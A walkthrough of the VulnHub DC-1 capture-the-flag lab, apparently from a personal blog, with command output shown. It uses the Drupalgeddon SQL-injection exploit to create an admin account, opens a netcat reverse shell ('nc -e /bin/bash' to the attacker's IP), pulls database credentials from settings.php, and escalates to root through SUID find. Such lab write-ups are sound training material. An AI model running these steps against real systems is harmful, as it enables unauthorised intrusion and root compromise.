Original Description
DC-1 is a purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing.
It was designed to be a challenge for beginners, but just how easy it is will depend on your skills and knowledge, and your ability to learn.
To successfully complete this challenge, you will require Linux skills, familiarity with the Linux command line and experience with basic penetration testing tools, such as the tools that can be found on Kali Linux, or Parrot Security OS.
There are multiple ways of gaining root, however, I have included some flags which contain clues for beginners.
There are five flags in total, but the ultimate goal is to find and read the flag in root’s home directory. You don’t even need to be root to do this, however, you will require root privileges.
Depending on your skill level, you may be able to skip finding most of these flags and go straight for root.
Beginners may encounter challenges that they have never come across previously, but a Google search should be all that is required to obtain the information required to complete this challenge.
Recon
root@kali:~# nmap -p- -A 10.128.1.152
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-04 12:44 EST
Nmap scan report for DC-1.stoeps.lab (10.128.1.152)
Host is up (0.00063s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey:
| 1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
| 2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
|_ 256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Debian))
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: Welcome to Drupal Site | Drupal Site
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 42642/tcp status
| 100024 1 49668/udp status
| 100024 1 57477/tcp6 status
|_ 100024 1 57545/udp6 status
42642/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:76:3D:59 (VMware)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.16
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Drupal
searchsploit drupal 7
------------------------------------------------------------------------------------------------------------------
Exploit Title | Path (/usr/share/exploitdb/)
------------------------------------------------------------------------------------------------------------------
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User) | exploits/php/webapps/34992.py
Create Admin account
root@kali:~/vulnhub/dc1# cp /usr/share/exploitdb/exploits/php/webapps/34992.py .
root@kali:~/vulnhub/dc1# dos2unix 34992.py
root@kali:~/vulnhub/dc1# ./34992.py -t http://10.128.1.152 -u stoeps -p pass
...
[!] VULNERABLE!
[!] Administrator user created!
[*] Login: stoeps
[*] Pass: pass
[*] Url: http://10.128.1.152/?q=node&destination=node
Now we can login to the drupal site and install modules, change settings and so on.
Goto: http://10.128.1.152/node/2#overlay-context=shell&overlay=admin/modules
Install https://www.drupal.org/project/shell
- Use the remote link to
.tar.gz
- Use the remote link to
Open Drupal Shell: http://10.128.1.152/shell
Opening netcat shell
Starting on Kali
nc -nlvp 7777
Start nc
in the Drupal shell
nc -e /bin/bash 10.128.1.154 7777
- Use the Kali IP here
Then get a real tty
python -c 'import pty; pty.spawn("/bin/sh")'
Grab the flags through netcat
shell and browser
Flag1
www-data@DC-1:/var/www$ cat flag1.txt
cat flag1.txt
Every good CMS needs a config file - and so do you.
Flag2
www-data@DC-1:/var/www/sites/default$ cat set
cat settings.php
<?php
/**
*
* flag2
* Brute force and dictionary attacks aren't the
* only ways to gain access (and you WILL need access).
* What can you do with these credentials?
*
*/
$databases = array (
'default' =>
array (
'default' =>
array (
'database' => 'drupaldb',
'username' => 'dbuser',
'password' => 'R0ck3t',
'host' => 'localhost',
'port' => '',
'driver' => 'mysql',
'prefix' => '',
),
),
);
...
Connect To MySQL Database From Command Line Guide
We can extract the user and passwords from mysql db, then crack with John the ripper, but not needed as we created our own admin account. I found nothing interesting in the database.
Flag3
Article on the dashboard within Drupal.
http://10.128.1.152/node/2#overlay-context=shell
Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.
Flag4
/home/flag4/flag4.txt
> cat /home/flag4/flag4.txt
Can you use this same method to find or access the flag in root?
Probably. But perhaps it's not that easy. Or maybe it is?
Flag4 was readable for the user www-data
, so no need to crack the password from /etc/shadow
.
Final Flag
www-data@DC-1:/var/www/sites/default$ find / -perm /4000
find / -perm /4000
/bin/mount
/bin/ping
/bin/su
/bin/ping6
/bin/umount
/usr/bin/at
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/find
/usr/sbin/exim4
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/sbin/mount.nfs
www-data@DC-1:/var/www/sites/default$ ls -l /usr/bin/find
ls -l /usr/bin/find
bash-4.2$ find . -exec '/bin/sh' \;
find . -exec '/bin/sh' \;
# whoami
whoami
root
# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=0(root),33(www-data)
# cd /root
cd /root
# ls
ls
thefinalflag.txt
find
can be used with -exec
# cat thefinalflag.txt
cat thefinalflag.txt
Well done!!!!
Hopefully you've enjoyed this and learned some new skills.
You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7
We’re done! Funny vulnhub machine which can be solved in a short time. Seeing forward to the other eight machines of that series. Thanks @DCAU7